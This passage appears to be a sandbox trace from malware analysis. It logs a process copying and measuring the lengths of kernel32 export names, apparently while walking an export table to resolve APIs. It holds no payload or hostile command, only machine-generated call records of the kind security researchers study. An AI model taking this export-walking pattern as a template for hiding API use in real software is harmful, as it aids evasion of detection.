returned="BaseCheckAppcompatCache" [0079.659] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.659] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.659] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.659] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.659] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.659] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.659] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.659] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.659] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.659] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.659] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.659] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.659] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.659] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.659] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.659] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.660] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.660] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.660] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.660] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.660] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.660] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.660] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.660] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.660] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.660] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.660] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.660] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.660] lstrlenA (lpString="BEEP") returned 4 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.660] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.660] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.660] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.660] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.661] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.661] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.661] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.661] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.661] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.661] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.661] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.661] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.661] lstrlenA (lpString="CANCELIO") returned 8 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.661] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.661] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.661] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.661] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.661] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.661] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.661] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.661] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.661] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.661] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.662] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.662] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.662] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.662] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.662] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.662] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.662] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.662] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.662] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.662] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.662] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.662] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.662] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.663] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.663] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.663] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.663] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.663] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.663] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.663] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.663] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.663] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.663] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.663] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.663] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.663] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.663] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.663] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.663] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.663] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.664] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.664] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.664] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.664] lstrlenA (lpString="COPYFILEA") returned 9 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.664] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.664] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.664] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.664] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.664] lstrlenA (lpString="COPYFILEW") returned 9 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.664] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.664] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.664] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.664] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.664] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.664] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.664] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.664] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.664] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.664] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.665] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.665] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.665] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.665] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.665] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.665] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.665] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.665] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.665] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.665] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.665] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.665] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.665] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.665] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.665] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.665] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.665] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.665] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.665] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.666] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.666] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.666] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.666] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.666] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.666] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 